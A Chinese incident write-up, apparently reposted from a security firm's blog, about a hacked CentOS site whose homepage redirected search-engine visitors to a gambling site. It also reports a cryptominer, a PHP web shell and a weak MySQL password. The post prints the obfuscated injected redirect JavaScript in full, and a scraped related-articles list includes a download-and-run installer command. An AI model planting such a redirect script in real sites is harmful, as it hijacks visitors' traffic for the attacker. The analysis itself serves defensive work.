如何解决公司网站首页被恶意跳转的安全问题

news/2024/5/9 18:38:41/文章来源:https://blog.csdn.net/weixin_34072458/article/details/92418680

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

近日某客户网站被黑,导致网站首页被篡改并跳转到赌博网站,网站在百度的收录也收录了一些什么彩票内容的快照,网站首页快照也被修改成赌博内容,并被百度直接红色风险拦截提示,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!我们SINE安全公司根据以上客户被黑的情况,立即进行了全面的网站安全检测,针对网站被黑的情况制定了详细的安全部署方案。

9fdf0f44bd1144faa2113e124016af16.png

首先客户网站使用的是Linux centos系统服务器,客户提供服务器ip,ssh端口,root账号密码后,我们进去查看了服务器是否存在被黑以及系统木马后门的情况,再一个我们对其使用的mysql数据库进行了安全检测,发现问题,该mysql数据库的root账号使用的是弱口令密码,导致攻击者可以利用软件对数据库进行强力破解,导致破解成功,利用root权限直接提权并上传脚本木马到网站的根目录下。

根据上面发现的数据库安全问题,我们深度挖掘,追踪溯源,发现服务器还存在木马后门,top,查看linux当前进程,发现一个可疑的进程,通过查看进程的详细信息我们发现该进程是木马后门进程,再仔细一检查发现该木马是挖矿木马,攻击者利用服务器资源,带宽,进行挖矿,像比特币、以太坊等币进行挖矿。

我们对其挖矿木马进行安全分析:如下图

8a17beb485de40609638b4c97209f23b.jpeg

解密木马内容,我们发现该木马目前来说是免杀的木马,一般人是看不出问题来,但是经常维护服务器的运维人员就会察觉出来,第一该木马隐藏到linux进程当中去,根据时间段进行挖矿,避开高峰时间,以及维护人员的工作时间,当挖矿的时候木马进程CPU占用达到百分之80以上,甚至有时候网站都打开很慢。服务器的木马查完后,我们对网站的源代码进行安全检测,发现网站目录里被上传了网站木马后门,php脚本木马,该脚本木马可以对网站进行读写新建等操作,网站的首页标题描述也被改成了什么赌博的内容如下图:

e578e41f5e6b40cfbb5336160758f729.png

<>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e

(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}

('3.4("<5 c=\\"b\\">");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\

\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\

\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\

\";");3.4("</5>");',25,25,'|s|indexOf|document|writeln||sogou|

baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

http|so|bing|yahoo|com|268238'.split('|'),0,{}))

</>

通过解密上面的代码发现,只要是从百度,搜狗,以及soso,so,bing等搜索引擎来的访问,都会直接跳转到攻击者设定好的赌博网站上去。随即我们SINE安全公司对该恶意代码进行了清除,网站恢复正常访问。

以上就是我们解决客户网站安全的整个过程,下面针对于此次网站被黑,提供如下 的网站安全建议:

1.对mysql数据库进行安全部署,对root账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为51158,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括SSH登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

转载于:https://my.oschina.net/u/3887295/blog/1863479

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_804939.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

神器扒网站——teleport ultra

转载:https://blog.csdn.net/leisure_life/article/details/69371904 神器扒网站——teleport ultra在平时的开发或者学习的过程中&#xff0c;我们难免会看到一些让人心动的网站&#xff0c;于是自己想把它搞下来&#xff0c;自己手工一个文件一个文件把它保存下来也可以实现&…

SEO网站优化需要抓住哪些重要环节?

一般网站内部优化包括&#xff1a;网站内链、网站内容、网站关键词、友链等等。如果一个网站内容质量特别的差&#xff0c;那么他想要获得用户和搜索引擎的认可同样是非常困难的。下面搜客大伟就跟大家介绍一下SEO网站优化需要抓住哪些重要环节&#xff1f; 1、外链 大部分人都…

【教程视频分享】Java SSM开发购物网站项目教程视频

获取方式——关注公众号&#xff1a;Java开发教程视频 点击【IT资源】即可获取

你离大牛就差这10家国内知名的慕课网站。

MOOC即Massive Open Online Course的缩写&#xff0c;翻译成中文就是&#xff1a;大规模的在线开放课程或者大型开放是网络课程&#xff0c;是任何人都可以注册使用的在线教育新模式&#xff0c;被人称之为是人类印刷术以来关于教育的重要发明&#xff0c;是一种新型的在线教育…

做一个网站真的有那么难吗?

现在这个互联网时代&#xff0c;什么都跟互联网挂钩&#xff0c;哪怕卖水果都开始用网店了&#xff08;其实我也想卖水果%>_<%&#xff09;。下面就讲一下水果哥和水果妹的依托互联网卖水果的故事。 背景介绍 话说再很久很久以前&#xff0c;有两个小伙伴一起合伙卖水果…

3行代码 为网站博客添加萌萌哒看板娘可爱二次元女动漫玩偶人物

看板娘一词源自日语“看板娘(かんばんむすめ)”。其中的“看板”指的是店面招牌&#xff0c;或者是为了宣传、打广告而制作的宣传牌。“看板娘”也就是店面的招牌姑娘&#xff0c;亦即能够提升店面人气和顾客流量的女服务生、女店员等。也就是说&#xff0c;看板娘本身就是一块…

用HTML+CSS编写一个计科院网站首页的静态网页

由于能力的不足&#xff0c;这个网页还有很多功能未完善&#xff0c;比如图片的滚动&#xff0c;在学习了javascript后我会将其完善。 以下是几张成品和工程的截图&#xff1a; 以下是完整的HTML和CSS代码&#xff1a; 1 <!DOCTYPE html>2 <html>3 <head>4 &…

宝塔安装建站教程

一、安装宝塔 centos安装脚本&#xff1a; yum install -y wget && wget -O install.sh http://download.bt.cn/install/install.sh && sh install.sh ubuntu、deepin安装脚本 wget -O install.sh http://download.bt.cn/install/install-ubuntu.sh &&…

用Meta标签代码让360双核浏览器默认极速模式打开网站不是兼容模式

公司所作的页面在360下打开都会遇到在360下自动跳到360兼容模式引发许多兼容问题&#xff0c;摸索了好久终于在网上找到了怎么解决的方法&#xff0c;详情如下: 其实360给网站开发者设计了一种选择的方法&#xff0c;只要加入一段Meta标签代码就可以解决。 以下信息摘自360官方…

个人博客一|抓取崔庆才个人博客网站前端源码

1、准备 工具&#xff1a;仿站小工具V9.0 工具获取方式一&#xff1a; 关注微信公众号 微信公众号『stormsha』&#xff0c;后台回复『仿站工具』获取工具 工具获取方式二&#xff1a; 仿站小工具官网 https://smalltool.github.io/崔庆才博客 https://cuiqingcai.com/从网站源…

美联邦调查局 FBI 网站被黑,数千特工信息泄露

百度智能云 云生态狂欢季 热门云产品1折起>>> 近日 TechCrunch 等多家媒体报导&#xff0c;一个黑客组织黑了美国联邦调查局 FBI 的附属网站&#xff0c;并泄露了数千名联邦特工和执法人员的个人信息。 黑客攻击了与 FBI 培训学院 National Academy Association 相关…

网站显示该内容被禁止访问的解决办法

2019独角兽企业重金招聘Python工程师标准>>> 如果您的网站首页或者内页面突然出现“该内容被禁止访问”的提示&#xff0c;那么说明你的网站被黑了&#xff0c;被黑什么了&#xff1f;我找找找&#xff0c;也没找出什么问题&#xff0c;到底是怎么回事&#xff0c;最…

nginx搭建静态网站

Nginx (engine x) 是一个高性能的HTTP和反向代理web服务,常用于负载均衡构架,以提高网站的并发量,概念不过多介绍,更多细节请自行百度, 本文是纯操作案例,假设你已经知道什么是nginx并且知道它用来干什么,那么你可以按照本文步骤来使用nginx搭建出一个静态网站 以此你可以对ngi…

国外10个最佳和最流行的酷站推荐网站

The FWA The FWA这个网站&#xff0c;相信不必多介绍了&#xff0c;这是许多国外Flash设计师梦寐以求的奖项的 优胜者通常通过显示The FWA徽章作为他们网站获奖的一个标志。 Best Web Gallery 访问Best Web Gallery您可能很长时间发现有没有更新&#xff0c;因为这个网站关注的…

Python | 7招教你识别一个网站是否是Django后台

目录&#xff1a;1. 利用Debug模式异常页面判断2. 通过CSRF Token验证3. Django Admin4. 通过HTTP头5. 拼凑细节6. 通过一些第三方模块的特点判断7. 分析静态文件最近事情有点多&#xff0c;一直没有时间写原创&#xff0c;而又一直想写点什么&#xff0c;今天早上正好空下来&a…

整理了一周的Python资料,包含各阶段所需网站、项目,收藏了慢慢来

这周应该有不少学校已经开学了&#xff0c;那么同学们都该动起来了&#xff0c;把家里面的那些懒习惯给扔掉了可以。 不知怎么的&#xff0c;最近不少关注我的读者都开始私信我怎么学好python&#xff1f;零基础转行是不是合适&#xff0c;还有希望吗&#xff1f;今年30了&…

【Git】GIT相关网站

GIT CHEAT SHEET 最后可以戳以下链接继续学习&#xff1a; https://git-scm.com/book/zh/v2 Git中文开发手册

要想知道自己在网上裸奔成啥样?这个网站一搜便知

很多网站都需要手机号注册&#xff0c;久而久之自己也不清楚注册了哪些网站。 有的网站可能注册过一次就再没用过&#xff0c;有的明明没有注册过但还是收到很多垃圾信息&#xff0c;可能是因为你手机号之前被别人用的时候&#xff0c;注册了你不知道的网站。 下面&#xff0…

你要的Python资料都在这里,包含各阶段所需学习网站、实战项目,收藏了慢慢来

不知怎么的&#xff0c;最近不少关注我的读者都开始私信我怎么学好python&#xff1f;零基础转行是不是合适&#xff0c;还有希望吗&#xff1f;今年30了&#xff0c;还能不能转IT&#xff1f; 其实关于零基础转型的&#xff0c;我以前写过一篇文章&#xff0c;没有看过的都可…

第 2 部分: SEO 关键词和基础设施策略

从左上角向下的关键词优化策略 只需两步&#xff0c;即可在关键词策略战役中取得成功&#xff1a; 关键词选择&#xff1a;判断页面提供了什么内容。然后判断潜在受众可能使用哪些词来搜索您的页面&#xff0c;并根据这些词创建关键词。 关键词优化&#xff1a;将这些关键词应用…